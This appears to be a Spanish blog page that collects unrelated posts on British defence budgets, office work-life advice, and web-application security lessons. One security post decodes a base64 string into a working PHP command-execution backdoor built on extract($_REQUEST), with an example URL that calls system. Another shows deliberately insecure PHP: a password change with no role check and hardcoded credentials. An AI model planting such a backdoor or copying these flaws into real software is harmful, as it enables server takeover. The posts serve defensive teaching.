Aunque no carente de problemas, las Real Fuerza Aérea británica es de momento y sin dudas la más sólida y creíble de las Fuerzas Armadas británicas. En ese contexto la RAF declaró hace unos días que su flota de tres aeronaves RC-135 Rivet Joint o "Airseeker" está plenamente operativa. Este pleno funcionamiento se alcanzó antes de lo previsto.

 

El RC-135W Rivet Joint es un avión de vigilancia electrónica para todo clima basado en el fuselaje C-135. Las tres aeronaves con que cuentan los británicos integran un sistema de armas que incluye una unidad de análisis basada en tierra. Algunos británicos se quejan de la condición de "avión para el reabastecimiento en vuelo convertido en avión de reconocimiento y vigilancia electrónica" del River Joint.

 

La tripulación de estos aparatos para un misión típica consta de unos 25 efectivos, con aproximadamente 35 para misiones de entrenamiento completo.

 

El Airseeker complementa la amplia gama de activos de Inteligencia, Vigilancia, Adquisición de objetivos y Reconocimiento (ISTAR, por sus siglas en inglés) de la RAF y para poder incorporar este sistema de armas Gran Bretaña recibió un fuerte espaldarazo de los Estados Unidos de Norteamérica. En conjunto, los Airseeker del Reino Unido y la USAF forman una flota combinada de 20 aviones.

 

 

Continuando con el artículo anterior sobre la importancia de cumplir con el horario de trabajo a la hora de salida, puedo comentar algunas razones que podríamos considerar:

 

En primer lugar debemos pensar en el descanso ya que después de más de nueve horas seguidas en el trabajo, necesitamos relajarnos, pensar en otras cosas, dormir y reponer energías.

 

Fijar límites: muchos creemos que si damos más del 100% en el trabajo, nuestros jefes nos verán con buenos ojos y podrían ser más consideramos con nosotros; esto está lejos de ser cierto ya permitimos que los demás se aprovechen y no valoramos nuestra vida privada.

 

Tener una vida personal y social: compartir con la familia y los amigos, inluirnos en un coro, tener un pasatiempos, tocar un instrumento musical, participar de un grupo parroquial, leer una buena novela o ver una pelicula agradable debe ser sumamente importante para toda persona. Estos momentos son irremplazables, hay que disfrutar de una reunión de amigos, un café, un abrazo con el esposo, una charla con el novio. Los encuentros y las cenas son un descanso, una necesidad psicológica y espiritual, una oportunidad para crecer como personas y trascender más allá del ámbito laboral.

 

Rutina de ejercicios: sería bueno también incorporar en nuestro día a día - considerando que tenemos tiempo después de salir de oficina - una rutina de ejercicios en casa o en un gimnasio.

 

Tiempo de mayor descanso: después de un día intenso de trabajo es bueno  tener nuestro propio tiempo para escuchar música, cocinar, descansar, dormir un poco más o simplemente pensar en nuestras propias cosas. De esta manera podemos recuperar las energías para seguir el día a día del trabajo.

 

Artículo relacionado:

geoestrategia.webnode.es/news/la-empresa-la-vida-no-empieza-ni-termina-en-la-oficina/

 

 

En este juego preguntábamos ¿qué es esto?:

 

QGV4dHJhY3QgKCRfUkVRVUVTVCk7IEBkaWUgKCR1bGFkbygkdWFyZWEpKTs=

 

Es fácil reconocer la codificación base64. Decodificando obtenemos el siguiente código PHP:

 

@extract ($_REQUEST); @die ($ulado($uarea));

 

En el código PHP que obtenemos tenemos que "@" es un operador de supresión de errores; "extract" importa variables a la tabla de símbolos actual desde una matriz; "$_REQUEST" es una matriz asociativa que por defecto contiene el contenido de $_GET, $_POST y $_COOKIE y "die()" es un constructor de lenguaje equivalente a "exit()". 

 

En el código descripto $_REQUEST está extrayendo cualquier contenido enviado a través de solicitudes GET o POST y creando variables para ellos, en nuestro caso $ulado y $uarea, nombres que hemos elegido con el expreso propósito de que no signifiquen nada en especial para que pasen desapercibidos. Entonces "die()" ejecutará lo que el atacante envíe con "ulado" y "uarea" como argumento, por ejemplo ulado=system y uarea=cualquier comando.

 

https://127.0.0.1/directorio/subdirectorio/puertatrasera.php?ulado=system&uarea=comando

 

Estamos entonces claramente ante la posibilidad de una inyección de comandos, por ende en presencia de una muy probable puerta trasera.

 

En cuanto a la cadena:

 

QGV4dHJhY3QgKCRfUkVRVUVTVCk7IEBkaWUgKCR1bGFkbygkdWFyZWEpKTs=

 

la misma podría esta inserta dentro de algo así como lo siguiente:

 

eval(base64_decode(QGV4 ... KTs=));

 

lo cual no tendría demasiado sentido, ya que el constructor de lenguaje "eval()" llamaría mucho la atención mientras que para muchos "@extract ($_REQUEST); @die ($ulado($uarea));" pasaría desapercibido, cuando no directamente incomprendido. La codificación base64 fue más una parte de la dinámica del juego que un artilugio para ocultar la funcionalidad real del código.

 

El juego pretende llamar la atención de lo desapercibidas que a veces pueden pasar algunas puertas traseras. Todos aquellos que deban asegurar el servidor y las aplicaciones que el mismo aloja deberán estar bien entrenados en detectar este tipo de artilugios. El pirata informático tratará que sus puertas traseras pasen desapercibidas a los programas de seguridad y a los controles manuales. Hay que prestar mucha atención y estar entrenado para detectar código malicioso. 

 

La puerta trasera se basa en una encontrada en blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html

 

Artículo relacionado:

geoestrategia.webnode.es/news/vulnerabilidades-de-aplicaciones-web-juego-de-verano-nivel-intermedio/

 

 

¿Qué es esto?:

 

QGV4dHJhY3QgKCRfUkVRVUVTVCk7IEBkaWUgKCR1bGFkbygkdWFyZWEpKTs=

 

Daremos la respuesta a la brevedad. Si alguien quiere hacerla llegar a nuestra dirección de contacto, será bienvenido y si lo desea, mencionado. Contacto: luis_lavric@hotmail.com

¡Gracias! 

 

 

Salir temprano de la oficina debe ser un principio para todos aquellos que cumplimos un horario de trabajo, además que es beneficioso para nuestra salud física y mental.

 

Puedo comentar sobre esto ya que hace unos meses no podía salir a tiempo de la oficina, se me acumulaban los pendientes, surgían temas de último momento haciendo que salir a la hora se convierta sólo en un propósito endeble.

 

Ahora puedo decir que salir a la hora  es una decisión que se deberá tomar dependiendo de la importancia y de la responsabilidad del trabajo por cumplir y que si las cosas están planificadas, esto debería ser de vez en cuando. Debemos considerar que siempre habrá tareas por hacer, los correos seguirán llegando y necesitarán ser contestados, habrá compras por atender, pagos por realizar y tantas cosas más. No todos tendrán la misma urgencia y/o importancia, ante esto debemos priorizar lo que se debe hacer.

 

Si nos proponemos salir a la hora nos obligamos también a organizar mejor nuestro trabajo. Hay varias razones para hacerlo, una de ellas es el descanso. Después de ocho o nueve horas  de labor hay desgaste y necesitamos reponer fuerzas y  distraernos. Pensar en otras cosas nos relaja. El tiempo libre ayuda a nuestra calidad de vida, beneficiando también a nuestra organización.

 

La mayoría de nosotros tiene familia, amigos y otros allegados que también merecen nuestro tiempo; personas con las que queremos compartir los momentos buenos y con las que queremos estar en los que no lo son tanto. Conviene tener clara nuestra escala de valores y no permitir que el trabajo la altere.

 

 

En nuestro artículo "GRAN BRETAÑA: CRECE LA PREOCUPACIÓN POR LA POSIBLE BAJA DE BUQUES Y EL RECORTE DE ROYAL MARINES" (geoestrategia.webnode.es/news/gran-bretana-crece-la-preocupacion-por-la-posible-baja-de-buques-y-el-recorte-de-royal-marines/) citábamos al titular de la Oficina Nacional de Auditoría de Gran Bretaña, Amyas Morse, diciendo que "en la actualidad, la brecha de asequibilidad [de equipamiento militar] oscila entre un mínimo de £ 4,9 mil millones a £ 20,8 mil millones si se materializan los riesgos financieros y no se logran ahorros ambiciosos". La última cifra representa aproximadamente 30 mil millones de dólares. Remarcábamos que ese es el máximo déficit potencial estimado, no el gasto.

 

El año pasado el gobierno de Londrés manifestó que quería que el Ministerio de Defensa recortara 10 mil millones de libras de su presupuesto en la próxima década, es decir mil millones de libras anuales - unos 1.390 millones de dólares por año. Los planes para la Royal Navy sería desprenderse de sus dos últimos buques de asalto anfibio, algunas fragatas y unos 2.000 Royal Marines. Por el portahelicópteros y buque de asalto anfibio HMS Ocean, ya prácticamente vendido a Brasil, los británicos recibirán la módica suma de 84 millones de libras después que hace apenas tres años gastaran 65 millones en reacondicionarlo y modernizarlo. De los potenciales casi 21.000 millones de libras de déficita ya ahorraron 19 millones...

 

Convengamos que los ingleses han hecho cosas peores, en el 2012 setenta y dos Harrier británicos fueron vendidos a los Estados Unidos de Norteamérica por la suma total de 110 millones de libras (153 millones de dólares), después de haberse invertido en ellos, sólo en concepto de mejoras, 600 millones de libras en una década. Se podrá decir que no son comparables pero en la actualidad un F-35B - avión que reemplazará a los Harrier - cuesta unos 135 millones de dólares. Todo parece indicar que los Harrier permancerán en servicio en el Cuerpo de  Infantería de Marina de los Estados Unidos por al menos diez años más.

 

No se sabe qué otros planes hay para recortar gastos en la Royal Navy, excepto por la posible baja de algunos marineros. La RN ya padece una seria escasez de tripulantes de modo que deberá ser cuidadosa con el despido de personal. Ya se habla de la posible cancelación de la construcción del séptimo submarino de la Clase Astute. Es la medida más realista que podría tomar los británicos, aunque esa también tiene una desventaja: el grueso de la industria bélica británica está dedicado exclusivamente a la producción de equipo militar, tiene ciertos rasgos que podrían tildarse de monopólicos y no conocemos ningún plan de diversificación. Por ahora los "ahorros ambiciosos" brillan por su ausencia. A nuestro entender la pesadilla defensiva británica recién empieza.

 

 

Son muchas las causas que generaron que el personal de mi oficina se encuentre dividido, se podría decir que hasta enfrentado. Sobre todo cuando se trata de evitar responsabilidades no tienen reparo en acusarse; a estas alturas nos queda motivarlos para que de alguna manera se integren, existen técnicas, dinámicas de grupo, charlas, actividades particulares de deporte y distracción.

 

Sabemos que integrar al equipo tomará su tiempo y también generará gastos, por eso es importante empezar cuanto antes, todos debemos comprender que formamos parte de una empresa y no somos piezas aisladas en una continua competencia.

 

Por lo pronto, empezaremos celebrando los días especiales como son los cumpleaños. Se invitará a todo el personal para una celebración en la misma oficina, pero se creará un ambiente distendido y relajado para pasar un momento agradable.  

 

Para el siguiente mes tenemos programada una actividad fuera de la oficina, la estamos organizando posiblemente sea una caminata.

 

También pensamos en un programa de capacitación a fin de mantenernos actualizados y que podamos desarrollarnos profesionalmente de una mejor manera.

 

No están demás charlas y talleres de coaching, por lo que contactaremos con un buen docente para que pueda asesorar, orientar y tomar conocimiento de la inversión.

 

Esperamos que se pueda promover un mejor ambiente de trabajo, sabemos que es difícil pero es mejor aprovechar el trabajo en equipo que de manera individual.

 

Artículos relacionados:

geoestrategia.webnode.es/news/la-empresa%3a-¡cuidado-mujeres-trabajando-con-otras-mujeres%21/

geoestrategia.webnode.es/news/la-empresa-resolviendo-los-conflictos-de-la-oficina/

 

 

Anteriormente comentamos que muchas veces el ambiente laboral se ve afectado por desacuerdos, malos entendidos, celos profesionales y otros. Ante esto pensemos que estas situaciones analizadas de una manera positiva y con el afán de mejorar podrían resultar ser enriquecedoras para la empresa.

 

Creo que lo importante es saber manejar estas situaciones, teniendo en cuenta que cada uno de nosotros tiene diferente educación, valores vividos con matices levemente diferentes (a veces hasta falta de verdaderos valores, con lo que es difícil lidiar), religión y personalidad. Debido a eso ante diferentes circunstancias todos reaccionaremos de diferente manera. La conflictividad también depende de la carga personal que llevemos a la oficina, muchas veces pasa lo contrario e invadimos nuestro hogar con problemas de la oficina.

 

Con reuniones periódicas  de trabajo se puede integrar más un equipo y se puede discutir mejor un determinado tema, es una oportunidad para que los integrantes den su opinión y se sientan informados.  Muchas veces los malos entendidos se dan porque no entendemos lo que nos solicitan o lo entendemos de otra manera; en una reunión de trabajo debemos preguntar, escuchar, ver otros puntos de vista, posibles soluciones.

 

Si estamos en medio de un desencuentro laboral y este se ha originado por un  asunto de trabajo, debe ser tratado desde esa perspectiva. No entremos en el terreno personal ya que se convertirá en un enfrentamiento permanente. Esta situación debe ser tratada con el mejor ánimo y se resuelta de una manera rápida y positiva, pensando que son temas laborales. Si dejamos que los problemas crezcan se resentirá no sólo el ambiente de trabajo sino también las relaciones personales, lo cual sería mucho más lamentable.

 

 

La pulseada por dinero fresco para la Defensa de Gran Bretaña todavía no tiene ningún ganador pero los fondos adicionales para sostener los megaproyectos y las grandes compras en el extranjero no aparecen ni hay señales positivas en tal sentido.

 

Quienes presionan para obtener más dinero sacan a la luz acontecimientos pasados desconocidos con la esperanza de poner de su lado al contribuyente británico. Así trascendió que en agosto del 2017  el barreminas Clase Hunt HMS Cattistock fue desplegado para escoltar a dos submarinos rusos de la clase Kilo y un remolcador de apoyo a través del Canal de la Mancha. Pasaron cinco meses de ese hecho que repentinamente se filtró con afirmaciones tales como que un "barco de plástico reforzado con vidrio" fue el encargado de la escolta. Al parecer los dos submarinos y el barco de apoyo no estaban operativos en ese momento y eso es algo que probablemente la Inteligencia británica no ignoraba. El barreminas podía cumplir bien la misión encomendada y de hecho lo hizo.

 

De todos modos el panorama de las finanzas de la Defensa británica está pasando de rojo a rojo oscuro. La National Audit Office (Oficina Nacional de Auditoría o NAO por sus siglas en inglés) británica puso cifras a lo que en nuestros portal venimos diciendo hace tiempo: que Gran Bretaña intenta abarcar mucho más de lo que puede. El titular de la NAO, Amyas Morse, afirmo que "en la actualidad, la brecha de asequibilidad oscila entre un mínimo de £ 4,9 mil millones a £ 20,8 mil millones si se materializan los riesgos financieros y no se logran ahorros ambiciosos". La última cifra representa aproximadamente 30 mil millones de dólares. Remarcamos que ese es el máximo déficit potencial estimado, no el gasto.

 

En esas circunstancias el temor de que se recorte drásticamente el número de Royal Marines y de que se decida prescindir de los restantes buques de asalto anfibio de la Royal Navy crece entre los mandos británicos. Los Royal Marines no sólo son la punta de lanza de cualquier operación anfibia británica, también son el semillero para fuerzas de élite como el SAS. Como vemos empiezan a entenderse las presiones para salvarlos. El tema es que el Ministro de Finanzas británico es Philip Hammond. A él le dedicamos un artículo completo hace ya cinco años y medio:

 

geoestrategia.webnode.es/news/el-maravilloso-mundo-de-philip-hammond/

 

Que el lector juzgue por sí mismo.  

 

 

En inglés esta vulnerabilidad suele recibir el nombre de "Privilege chaining" (Encadenamiento de privilegios) aunque sería más correcto llamarla "Combinación descuidada de privilegios". El problema se presenta cuando los roles y/o privilegios se combinan de modo que permitan a alguien realizar acciones inseguras.

 

Clarificamos con un ejemplo. El archivo "frente.html" es como sigue:

 

<html>

<h1>Combinación descuidada de privilegios</h1>

<form action="atras.php" method="post">

    Usuario: <input type="text" name="usuario" value="">

    Contrasena: <input type="password" name="clave" value="">

    <input type="submit">

</form>

</html> 

 

siendo "atras.php":

 

<?php

$usuario = $_POST['usuario'];

$clave = $_POST['clave'];

if (($username == 'Guillermo') && ($clave == '%#compu1234HT')){

$rol = "administrador";

}elseif (($usuario == 'Catalina') && ($clave == 'trabajoZxcY$8')){

$rol = "colaborador";

}elseif (($usuario == 'Javier') && ($clave == 'carroViejo44&&')){

$rol = "usuario";

}else{

$rol = "invitado";

}

 

if (($rol =="usuario") || ($rol =="invitado")){

header('Location: frente.php');

exit;

}

?>

 

<html>

<h1>Cambio de contraseñas</h1>

<form action="cambio.php" method="post">

    Usuario: <input type="text" name="nombre" value="">

    Contrasena: <input type="password" name="acceso" value="">

    Confirmar ctsna.: <input type="password" name="verificar" value=""> 

<input type="submit">

</form>

</html>

 

y finalmente cambio.php es:

 

<?php

$nombre = $_POST['nombre'];

$acceso = $_POST['acceso'];

$verificar = $_POST['verificar'];

if ($acceso == $verificar) {

echo "La contraseña de $nombre ha sido cambiada a $acceso exitosamente";

}

?>

 

Como vemos, Catalina, que es colaboradora del sitio, de ser necesario puede cambiar contraseñas y eso está bien. El problema es que como no se verifica su rol al momento de cambiarlas hay un "encadenamiento de privilegios" y si Catalina conociera la vulnerabilidad, de querer hacerlo podría cambiar la clave de acceso del administrador. Sólo debería conocer el nombre de usuario del mismo que demasiado a menudo es Admin, admin, Administrador, administrador...  

 

¡Cuidado, el código fue simplificado para facilitar su comprensión. No use combinaciones usuario/contraseña incrustadas en el programa, mucho menos en texto plano!